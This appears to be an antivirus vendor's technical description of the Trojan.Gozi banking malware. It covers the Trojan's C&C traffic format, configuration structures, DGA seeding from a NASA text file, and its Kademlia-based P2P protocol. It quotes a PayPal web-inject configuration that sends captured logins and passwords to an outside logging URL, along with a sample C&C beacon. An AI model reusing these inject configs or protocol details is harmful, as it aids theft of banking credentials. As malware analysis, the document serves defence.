Trojan.Gozi

A modified version of a well-known banking Trojan that is able to create P2P botnet. It can execute the following functions:

• Steals login credentials from web data forms (formgrabbing)
• Loggs keystrokes on the infected computer (keylogging)
• Injects arbitrary content into webpages loaded in browser windows (web injections)
• Uses Virtual Network Computing (VNC) in order to get remote access to the computer’s desktop
• Runs the SOCKS proxy server upon a command
• Downloads and installs plug-ins

To transmit information, the Trojan uses HTTP protocol. Information is encrypted in the GET request that looks as follows:

http://made****h.pw/images/EYI/uE4P5lkUATTfrO/L4Iv7VEvWWlYBM9qKuE67ixOoebU1ef9HHS7Xvwhns0o
bfoegeauxh8PajwSUrNkSFTtqnU/Fy/MyNURytngSxc_2FYvcf9O
98PFCv2bBHEE//jMiPVxyqqgQ/f_2/FBgMUnmhszPJ5_2BuSA.gif

After decryption, the following line is obtained:

jkwerhw=sdalfwewesd3&server=12&crc=7b033&version=214721&user=55deba95d542febda
b0e1570986cdaf0&soft=1&id=1045

Where:
server, id—retrieved from the Trojan’s configuration;
user—unique bot identifier;
crc—the crc32 function is used for configuration (if this function is missing, the value is obtained using the GetTickCount function).

The Trojan sends requests to various types of scripts:

• .jpeg—request for web injection configuration;
• .gif—request for a personal task;
• .bmp—sending logs to the server; data is transmitted as multipart/form-data.

The server’s response is encrypted with the RSA+Serpent+XOR algorithms. If the message contains information about web injections, they are compressed with aplib. Such-like messages consist of separate blocks:

struct block_t
{
    DWORD size;
    BYTE data[size]; //a line with a zero character in the end
}

An example of a web injection into the PayPal webpage:

*paypal.*
id="js_transactionCollection"
id="js_transactionCollection" style="visibility:hidden"
...
Order
*paypal.com/*/cgi-bin/merchantpaymentweb*
PROCESS
check.unitssl.com/log.php?action=log&text=pp;l=@login@;p=@pass@&botid=@ID@
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_email
login
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_password
pass

The last section of the executable file is used to store information on the Trojan’s configuration directory:

2E 72 65 6C-6F 63 00 00-00 30 00 00-00 10 02 00  .reloc   0   ►☻
00 26 00 00-00 D8 01 00-00 00 00 00-00 00 00 00   &   ╪☺
00 00 00 00-40 00 00 40-00 00 00 00-00 00 00 00      @  @
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
4A 31 00 00-00 32 02 00-84 00 00 00-64 5E 28 E1  J1   2☻ Д   d^(с
00 01 01 00-4A 31 00 00-00 34 02 00-81 01 00 00   ☺☺ J1   4☻ Б☺
CB AF 22 D7-00 20 01 00-00 00 00 00-00 00 00 00  ╦п"╫  ☺
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00

This section can be found by the 0x314a value and looks as follows:

struct config_block_t
{
  WORD magic;
  WORD numHashes; 
  DWORD pos; //rva of the configuration
  DWORD size; //size
  DWORD id; //configuration ID
  DWORD flag; //0x10000—aplib compression
  DWORD hashes[numHashes];
};

If the relevant flag is set, all retrieved data is unpacked with aplib. This data together with associated parameters looks as follows:

{"GROUP": "1045", "1481529637": "10", "SENDTIMEOUT": "200", "BCTIMEOUT": "10",
 "CONFIGFAILTIMEOUT": "200", "TASKTIMEOUT": "200", "DGA_SEED": "1", "HOSTS": "127.0.0.1",
 "SERVERKEY": "87654321POIUYTRE", "SERVER": "12", "KNOCKERTIMEOUT": "200",
 "CONFIGTIMEOUT": "200", "287775871": "1"}

Where:

GROUP - id, SERVER—server in the request; 
DGA_SEED—DGA initialization constant;
SERVERKEY—key for serpent;
HOSTS—list of C&C servers with spaces.

Trojan.Gozi employs domain generation algorithm (DGA). To do this, the Trojan downloads a text file from the NASA server:

http://nssdc.gsfc.nasa.gov/planetary/text/pioneer-11_endops.txt

Using words containing in the text file, the Trojan calculates the current date, which allows it to generate a domain name of the C&C server, employing a special algorithm. Every 15 days, the Trojan automatically changes its control server address. All the transferred information is encrypted.

To generate P2P botnet, a kademlia-based protocol is used. UDP packets are encrypted with RC4 and have the following structure:

struct kad_t
{
    BYTE flag; //random value, except two lowest bits, 0 bit - a packet encrypted with sendKey, 1 bit - (1) a packet encrypted with sendKey=0 or (0) sendKey=nid1^nid2^nid3^nid4
    DWORD rndKey; //random component of the key
    kad_transport_t transport; //encrypted
    kad_head_t head; // encrypted
    BYTE data[]; // encrypted
}
 
struct kad_transport_t
{
    DWORD magic; //the 0x395F2EC1 value
    DWORD sendKey; //random value used to encrypt responses
    DWORD recvKey;
}
 
struct kad_head_t
{
    BYTE opType; //0xe4 - UDP KAD
    BYTE op; //commands of the protocol
    WORD size; //length of kad_t.data
};

Received and downloaded files are stored at:

%APPDATA%\\Microsoft\\{%08X-%04X-%04X-%04X-%08X%04X}\<md5hashOfName>

News about the Trojan